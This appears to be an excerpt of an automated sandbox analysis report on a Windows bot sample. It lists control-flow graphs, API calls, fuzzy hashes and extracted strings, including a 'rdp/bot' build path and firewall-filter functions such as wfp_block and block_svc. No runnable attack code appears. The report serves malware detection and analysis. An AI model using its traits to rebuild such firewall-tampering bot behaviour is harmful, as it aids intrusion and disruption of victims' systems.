                                                                                                                  • Instruction Fuzzy Hash: 0AA1F262A0D68681EA20BB15E4507B92760EF6E784F49503ADA8EC7FB7DE3CE545C300

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 570 7ff64b939181-7ff64b939186 571 7ff64b9390e4-7ff64b9390ec 570->571 572 7ff64b938e63-7ff64b938e6b 571->572 573 7ff64b9390f2-7ff64b939109 GetProcessHeap HeapFree 571->573 574 7ff64b938e72-7ff64b938e82 572->574 573->572 576 7ff64b938e88-7ff64b938e8a 574->576 577 7ff64b938da0-7ff64b938da3 574->577 576->577 580 7ff64b938e90-7ff64b938eca call 7ff64b93a1f1 576->580 578 7ff64b938da9-7ff64b938db2 FreeLibrary 577->578 579 7ff64b939284-7ff64b939299 577->579 578->579 580->574 583 7ff64b938ecc-7ff64b938f29 strlen 580->583 585 7ff64b938f2f-7ff64b938f5e 583->585 586 7ff64b938e2e-7ff64b938e49 call 7ff64b9314e2 583->586 590 7ff64b938e4b-7ff64b938e5e call 7ff64b9314e2 585->590 591 7ff64b938f64-7ff64b938f8d GetProcessHeap HeapAlloc 585->591 586->574 590->572 593 7ff64b9390a4-7ff64b9390c4 call 7ff64b9314e2 591->593 594 7ff64b938f93-7ff64b938fac 591->594 593->572 599 7ff64b9390c9-7ff64b9390df call 7ff64b9314e2 594->599 600 7ff64b938fb2-7ff64b939067 BuildTrusteeWithSidW BuildSecurityDescriptorW 594->600 599->571 602 7ff64b9391a9-7ff64b9391da call 7ff64b93795a 600->602 603 7ff64b93906d-7ff64b939086 call 7ff64b9314e2 600->603 609 7ff64b9391dc-7ff64b9391ea LocalFree 602->609 610 7ff64b9391ef-7ff64b939205 call 7ff64b9314e2 602->610 611 7ff64b93908c 603->611 612 7ff64b93910e-7ff64b939114 603->612 609->571 610->609 616 7ff64b93919f-7ff64b9391a4 611->616 617 7ff64b939092-7ff64b93909f 611->617 613 7ff64b93911a-7ff64b939120 612->613 614 7ff64b939211-7ff64b939216 612->614 618 7ff64b939153-7ff64b939159 613->618 619 7ff64b939122-7ff64b939125 613->619 614->571 616->571 617->593 621 7ff64b939239-7ff64b93923e 618->621 622 7ff64b93915f-7ff64b939165 618->622 623 7ff64b939127-7ff64b93912a 619->623 624 7ff64b939140-7ff64b939146 619->624 621->571 625 7ff64b93916b-7ff64b939171 622->625 626 7ff64b939243-7ff64b939248 622->626 627 7ff64b93921b-7ff64b939220 623->627 628 7ff64b939130-7ff64b939133 623->628 629 7ff64b93914c-7ff64b939151 624->629 630 7ff64b93922f-7ff64b939234 624->630 631 7ff64b939177-7ff64b93917c 625->631 632 7ff64b93924d-7ff64b939252 625->632 626->571 627->571 633 7ff64b939139-7ff64b93913e 628->633 634 7ff64b939225-7ff64b93922a 628->634 629->571 630->571 631->571 632->571 633->571 634->571
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                  • Opcode ID: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
                                                                                                                  • Instruction ID: 1da36d4e42f207c01e49a53cdddf2374e833d00eecdd2a9946284648996b3117
                                                                                                                  • Opcode Fuzzy Hash: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
                                                                                                                  • Instruction Fuzzy Hash: 84518E3260CBC285E770AB51E4843AAB760FB9A744F005135CA8DC3BAAEF3DD549CB41

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 635 7ff64b93918b-7ff64b939190 636 7ff64b9390e4-7ff64b9390ec 635->636 637 7ff64b938e63-7ff64b938e6b 636->637 638 7ff64b9390f2-7ff64b939109 GetProcessHeap HeapFree 636->638 639 7ff64b938e72-7ff64b938e82 637->639 638->637 641 7ff64b938e88-7ff64b938e8a 639->641 642 7ff64b938da0-7ff64b938da3 639->642 641->642 645 7ff64b938e90-7ff64b938eca call 7ff64b93a1f1 641->645 643 7ff64b938da9-7ff64b938db2 FreeLibrary 642->643 644 7ff64b939284-7ff64b939299 642->644 643->644 645->639 648 7ff64b938ecc-7ff64b938f29 strlen 645->648 650 7ff64b938f2f-7ff64b938f5e 648->650 651 7ff64b938e2e-7ff64b938e49 call 7ff64b9314e2 648->651 655 7ff64b938e4b-7ff64b938e5e call 7ff64b9314e2 650->655 656 7ff64b938f64-7ff64b938f8d GetProcessHeap HeapAlloc 650->656 651->639 655->637 658 7ff64b9390a4-7ff64b9390c4 call 7ff64b9314e2 656->658 659 7ff64b938f93-7ff64b938fac 656->659 658->637 664 7ff64b9390c9-7ff64b9390df call 7ff64b9314e2 659->664 665 7ff64b938fb2-7ff64b939067 BuildTrusteeWithSidW BuildSecurityDescriptorW 659->665 664->636 667 7ff64b9391a9-7ff64b9391da call 7ff64b93795a 665->667 668 7ff64b93906d-7ff64b939086 call 7ff64b9314e2 665->668 674 7ff64b9391dc-7ff64b9391ea LocalFree 667->674 675 7ff64b9391ef-7ff64b939205 call 7ff64b9314e2 667->675 676 7ff64b93908c 668->676 677 7ff64b93910e-7ff64b939114 668->677 674->636 675->674 681 7ff64b93919f-7ff64b9391a4 676->681 682 7ff64b939092-7ff64b93909f 676->682 678 7ff64b93911a-7ff64b939120 677->678 679 7ff64b939211-7ff64b939216 677->679 683 7ff64b939153-7ff64b939159 678->683 684 7ff64b939122-7ff64b939125 678->684 679->636 681->636 682->658 686 7ff64b939239-7ff64b93923e 683->686 687 7ff64b93915f-7ff64b939165 683->687 688 7ff64b939127-7ff64b93912a 684->688 689 7ff64b939140-7ff64b939146 684->689 686->636 690 7ff64b93916b-7ff64b939171 687->690 691 7ff64b939243-7ff64b939248 687->691 692 7ff64b93921b-7ff64b939220 688->692 693 7ff64b939130-7ff64b939133 688->693 694 7ff64b93914c-7ff64b939151 689->694 695 7ff64b93922f-7ff64b939234 689->695 696 7ff64b939177-7ff64b93917c 690->696 697 7ff64b93924d-7ff64b939252 690->697 691->636 692->636 698 7ff64b939139-7ff64b93913e 693->698 699 7ff64b939225-7ff64b93922a 693->699 694->636 695->636 696->636 697->636 698->636 699->636
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                  • Opcode ID: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
                                                                                                                  • Instruction ID: c9146b33a5f8b32258c7be39423e605665bd1196a938323d65146361388fef64
                                                                                                                  • Opcode Fuzzy Hash: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
                                                                                                                  • Instruction Fuzzy Hash: 95518C3260CBC285E770AB51E4843AAB760FB9A744F005135CA8DC3BAAEF3DD549CB41

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 700 7ff64b939195-7ff64b93919a 701 7ff64b9390e4-7ff64b9390ec 700->701 702 7ff64b938e63-7ff64b938e6b 701->702 703 7ff64b9390f2-7ff64b939109 GetProcessHeap HeapFree 701->703 704 7ff64b938e72-7ff64b938e82 702->704 703->702 706 7ff64b938e88-7ff64b938e8a 704->706 707 7ff64b938da0-7ff64b938da3 704->707 706->707 710 7ff64b938e90-7ff64b938eca call 7ff64b93a1f1 706->710 708 7ff64b938da9-7ff64b938db2 FreeLibrary 707->708 709 7ff64b939284-7ff64b939299 707->709 708->709 710->704 713 7ff64b938ecc-7ff64b938f29 strlen 710->713 715 7ff64b938f2f-7ff64b938f5e 713->715 716 7ff64b938e2e-7ff64b938e49 call 7ff64b9314e2 713->716 720 7ff64b938e4b-7ff64b938e5e call 7ff64b9314e2 715->720 721 7ff64b938f64-7ff64b938f8d GetProcessHeap HeapAlloc 715->721 716->704 720->702 723 7ff64b9390a4-7ff64b9390c4 call 7ff64b9314e2 721->723 724 7ff64b938f93-7ff64b938fac 721->724 723->702 729 7ff64b9390c9-7ff64b9390df call 7ff64b9314e2 724->729 730 7ff64b938fb2-7ff64b939067 BuildTrusteeWithSidW BuildSecurityDescriptorW 724->730 729->701 732 7ff64b9391a9-7ff64b9391da call 7ff64b93795a 730->732 733 7ff64b93906d-7ff64b939086 call 7ff64b9314e2 730->733 739 7ff64b9391dc-7ff64b9391ea LocalFree 732->739 740 7ff64b9391ef-7ff64b939205 call 7ff64b9314e2 732->740 741 7ff64b93908c 733->741 742 7ff64b93910e-7ff64b939114 733->742 739->701 740->739 746 7ff64b93919f-7ff64b9391a4 741->746 747 7ff64b939092-7ff64b93909f 741->747 743 7ff64b93911a-7ff64b939120 742->743 744 7ff64b939211-7ff64b939216 742->744 748 7ff64b939153-7ff64b939159 743->748 749 7ff64b939122-7ff64b939125 743->749 744->701 746->701 747->723 751 7ff64b939239-7ff64b93923e 748->751 752 7ff64b93915f-7ff64b939165 748->752 753 7ff64b939127-7ff64b93912a 749->753 754 7ff64b939140-7ff64b939146 749->754 751->701 755 7ff64b93916b-7ff64b939171 752->755 756 7ff64b939243-7ff64b939248 752->756 757 7ff64b93921b-7ff64b939220 753->757 758 7ff64b939130-7ff64b939133 753->758 759 7ff64b93914c-7ff64b939151 754->759 760 7ff64b93922f-7ff64b939234 754->760 761 7ff64b939177-7ff64b93917c 755->761 762 7ff64b93924d-7ff64b939252 755->762 756->701 757->701 763 7ff64b939139-7ff64b93913e 758->763 764 7ff64b939225-7ff64b93922a 758->764 759->701 760->701 761->701 762->701 763->701 764->701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                  • Opcode ID: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
                                                                                                                  • Instruction ID: e61566c1a48039df4b3e3ad65ddb3595e9c6136e32ab00857657c1c1be56f761
                                                                                                                  • Opcode Fuzzy Hash: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
                                                                                                                  • Instruction Fuzzy Hash: B8518E3260CBC285E770AB51E4843AAB760FB9A744F005135CA8DC3BAAEF3DD549CB41

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                  • Opcode ID: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
                                                                                                                  • Instruction ID: 6b3b52f1f4a28b17d94f24b37900029aca6692fec7a0e697f8577b48754c98c2
                                                                                                                  • Opcode Fuzzy Hash: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
                                                                                                                  • Instruction Fuzzy Hash: C8413C61A0C647A1FAA0BB81E9407B52760BF1E344F545036DA6EC69B6DF3CA94AC341

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                  • Opcode ID: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
                                                                                                                  • Instruction ID: 909dda394e66df0e1427f4262715d7a3ca35735bb8b34fab21560baf30d75d16
                                                                                                                  • Opcode Fuzzy Hash: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
                                                                                                                  • Instruction Fuzzy Hash: 47413261A1C547A1FA50BB90E9447B52650BF5E348F58503AD92EC6DB3DF7CA949C300

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                  • API String ID: 2918714741-1670302297
                                                                                                                  • Opcode ID: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
                                                                                                                  • Instruction ID: c691b107b1ad0cdf914510d4e780ba1d6995e0345116f2e1542a221f16c8244a
                                                                                                                  • Opcode Fuzzy Hash: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
                                                                                                                  • Instruction Fuzzy Hash: D5215C62A0C64696E761BF55E8407AA3760BB4E784F444036EE4CC7A76DF3CE845C700

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                  • String ID: .$1
                                                                                                                  • API String ID: 513531256-1839485796
                                                                                                                  • Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                                                                                                  • Instruction ID: 4800a136b6c24a39cf25b379bc82ccfd8f807c88722fa9e9db3ca3e0293dbb02
                                                                                                                  • Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                                                                                                  • Instruction Fuzzy Hash: 02414921A0C68686F320BB21E8543BA63A0BB8F784F444035DA5DC7BB7DF2CE5868740

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                                                                                                                  • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                                                                                                                  • API String ID: 1522850966-2029202777
                                                                                                                  • Opcode ID: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
                                                                                                                  • Instruction ID: 20a1295a974aaad5917e3afa71e7546fcf03fe7526ddaa8f02999ce1b5c6e9eb
                                                                                                                  • Opcode Fuzzy Hash: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
                                                                                                                  • Instruction Fuzzy Hash: 11517F2661CB8185F761AB15F4807AA73A6FB89784F009135DA8DC7B6AEF3DD440CB80
                                                                                                                  APIs
                                                                                                                  • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,000002C49A9414D0,?,00007FF64B9314B4,?,?,00000001,00007FF64B9314D2), ref: 00007FF64B939701
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close0EngineFwpmwcscmp
                                                                                                                  • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                                                                                                                  • API String ID: 4239307310-774261742
                                                                                                                  • Opcode ID: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
                                                                                                                  • Instruction ID: c90c49334822fcd86f3e7201716a070b56364d1dbd46634279c276d8e629efa9
                                                                                                                  • Opcode Fuzzy Hash: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
                                                                                                                  • Instruction Fuzzy Hash: 52317E51B0D64341FB50BA69E5903BA1251AF6F3C4F502035EA5FCBEB7EE5CE8858740
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                  • API String ID: 1799206407-4111913120
                                                                                                                  • Opcode ID: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
                                                                                                                  • Instruction ID: 506494c3b153d426165a0e83ea8d2f5a6e95f51e2d81560e80857852a65ee00c
                                                                                                                  • Opcode Fuzzy Hash: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
                                                                                                                  • Instruction Fuzzy Hash: 3821C950E0C48382FBB47A58E48837962915F4F70AF606532D15ECBAFBCE5CEC859282
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                  • Opcode ID: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
                                                                                                                  • Instruction ID: b81ac146128e40aa949afbdd64130df0ff786f0d82b0db53062166706af40e32
